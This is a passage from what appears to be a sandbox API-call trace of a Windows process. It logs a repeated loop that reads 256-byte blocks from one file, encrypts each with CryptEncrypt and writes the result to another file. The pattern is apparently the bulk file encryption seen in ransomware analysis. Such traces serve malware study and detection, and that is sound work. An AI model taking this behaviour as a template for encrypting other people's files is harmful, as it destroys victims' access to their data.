lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0167.458] ReadFile (in: hFile=0x15b0, lpBuffer=0x2882928, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2882928*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0167.458] CryptEncrypt (in: hKey=0x9ad6b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0167.458] GetLastError () returned 0x0 [0167.458] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0167.458] ReadFile (in: hFile=0x15b0, lpBuffer=0x2882928, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2882928*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0167.458] CryptEncrypt (in: hKey=0x9ad6b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0167.458] GetLastError () returned 0x0 [0167.458] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0167.458] ReadFile (in: hFile=0x15b0, lpBuffer=0x2882928, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2882928*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0167.458] CryptEncrypt (in: hKey=0x9ad6b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0167.459] GetLastError () returned 0x0 [0167.459] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0167.459] ReadFile (in: hFile=0x15b0, lpBuffer=0x2882928, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2882928*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0167.459] CryptEncrypt (in: hKey=0x9ad6b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0167.459] GetLastError () returned 0x0 [0167.459] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0167.459] ReadFile (in: hFile=0x15b0, lpBuffer=0x2882928, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2882928*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0167.459] CryptEncrypt (in: hKey=0x9ad6b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0167.459] GetLastError () returned 0x0 [0167.459] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0167.459] ReadFile (in: hFile=0x15b0, lpBuffer=0x2882928, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2882928*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0167.459] CryptEncrypt (in: hKey=0x9ad6b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0167.459] GetLastError () returned 0x0 [0167.459] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0167.459] ReadFile (in: hFile=0x15b0, lpBuffer=0x2882928, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2882928*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0167.459] CryptEncrypt (in: hKey=0x9ad6b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0167.459] GetLastError () returned 0x0 [0167.459] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0167.459] ReadFile (in: hFile=0x15b0, lpBuffer=0x2882928, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2882928*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0167.459] CryptEncrypt (in: hKey=0x9ad6b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0167.459] GetLastError () returned 0x0 [0167.459] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0167.459] ReadFile (in: hFile=0x15b0, lpBuffer=0x2882928, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2882928*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0167.459] CryptEncrypt (in: hKey=0x9ad6b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0167.459] GetLastError () returned 0x0 [0167.459] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0167.460] ReadFile (in: hFile=0x15b0, lpBuffer=0x2882928, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2882928*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0167.460] CryptEncrypt (in: hKey=0x9ad6b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0167.460] GetLastError () returned 0x0 [0167.460] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0167.460] ReadFile (in: hFile=0x15b0, lpBuffer=0x2882928, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2882928*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0167.460] CryptEncrypt (in: hKey=0x9ad6b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0167.460] GetLastError () returned 0x0 [0167.460] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0167.460] ReadFile (in: hFile=0x15b0, lpBuffer=0x2882928, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2882928*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0167.460] CryptEncrypt (in: hKey=0x9ad6b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0167.460] GetLastError () returned 0x0 [0167.460] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0167.460] ReadFile (in: hFile=0x15b0, lpBuffer=0x2882928, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2882928*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0167.460] CryptEncrypt (in: hKey=0x9ad6b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0167.460] GetLastError () returned 0x0 [0167.460] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0167.460] ReadFile (in: hFile=0x15b0, lpBuffer=0x2882928, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2882928*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0167.460] CryptEncrypt (in: hKey=0x9ad6b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0167.460] GetLastError () returned 0x0 [0167.461] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0167.461] ReadFile (in: hFile=0x15b0, lpBuffer=0x2882928, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2882928*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0167.461] CryptEncrypt (in: hKey=0x9ad6b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0167.461] GetLastError () returned 0x0 [0167.461] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0167.461] ReadFile (in: hFile=0x15b0, lpBuffer=0x2882928, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2882928*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0167.461] CryptEncrypt (in: hKey=0x9ad6b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0167.461] GetLastError () returned 0x0 [0167.461] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0167.461] ReadFile (in: hFile=0x15b0, lpBuffer=0x2882928, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2882928*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0167.461] CryptEncrypt (in: hKey=0x9ad6b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0167.461] GetLastError () returned 0x0 [0167.461] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0167.461] ReadFile (in: hFile=0x15b0, lpBuffer=0x2882928, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2882928*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0167.461] CryptEncrypt (in: hKey=0x9ad6b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0167.461] GetLastError () returned 0x0 [0167.461] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0167.461] ReadFile (in: hFile=0x15b0, lpBuffer=0x2882928, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2882928*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0167.461] CryptEncrypt (in: hKey=0x9ad6b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0167.461] GetLastError () returned 0x0 [0167.461] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0167.461] ReadFile (in: hFile=0x15b0, lpBuffer=0x2882928, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2882928*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0167.461] CryptEncrypt (in: hKey=0x9ad6b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0167.461] GetLastError () returned 0x0 [0167.461] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0167.462] ReadFile (in: hFile=0x15b0, lpBuffer=0x2882928, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2882928*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0167.462] CryptEncrypt (in: hKey=0x9ad6b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0167.462] GetLastError () returned 0x0 [0167.462] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0167.462] ReadFile (in: hFile=0x15b0, lpBuffer=0x2882928, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2882928*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0167.462] CryptEncrypt (in: hKey=0x9ad6b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0167.462] GetLastError () returned 0x0 [0167.462] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0167.462] ReadFile (in: hFile=0x15b0, lpBuffer=0x2882928, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2882928*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0167.462] CryptEncrypt (in: hKey=0x9ad6b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0167.462] GetLastError () returned 0x0 [0167.462] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0167.462] ReadFile (in: hFile=0x15b0, lpBuffer=0x2882928, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2882928*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0167.462] CryptEncrypt (in: hKey=0x9ad6b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0167.462] GetLastError () returned 0x0 [0167.462] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0167.462] ReadFile (in: hFile=0x15b0, lpBuffer=0x2882928, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2882928*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0167.462] CryptEncrypt (in: hKey=0x9ad6b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0167.462] GetLastError () returned 0x0 [0167.462] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0167.462] ReadFile (in: hFile=0x15b0, lpBuffer=0x2882928, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2882928*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0167.462] CryptEncrypt (in: hKey=0x9ad6b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0167.462] GetLastError () returned 0x0 [0167.462] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0167.462] ReadFile (in: hFile=0x15b0, lpBuffer=0x2882928, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2882928*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0167.462] CryptEncrypt (in: hKey=0x9ad6b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0167.463] GetLastError () returned 0x0 [0167.463] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0167.463] ReadFile (in: hFile=0x15b0, lpBuffer=0x2882928, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2882928*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0167.463] CryptEncrypt (in: hKey=0x9ad6b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0167.463] GetLastError () returned 0x0 [0167.463] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0167.463] ReadFile (in: hFile=0x15b0, lpBuffer=0x2882928, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2882928*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0167.463] CryptEncrypt (in: hKey=0x9ad6b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0167.463] GetLastError () returned 0x0 [0167.463] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0167.463] ReadFile (in: hFile=0x15b0, lpBuffer=0x2882928, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2882928*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0167.463] CryptEncrypt (in: hKey=0x9ad6b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0167.463] GetLastError () returned 0x0 [0167.463] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0167.463] ReadFile (in: hFile=0x15b0, lpBuffer=0x2882928, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2882928*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0167.463] CryptEncrypt (in: hKey=0x9ad6b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0167.463] GetLastError () returned 0x0 [0167.463] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0167.463] ReadFile (in: hFile=0x15b0, lpBuffer=0x2882928, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2882928*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0167.463] CryptEncrypt (in: hKey=0x9ad6b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0167.463] GetLastError () returned 0x0 [0167.463] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, 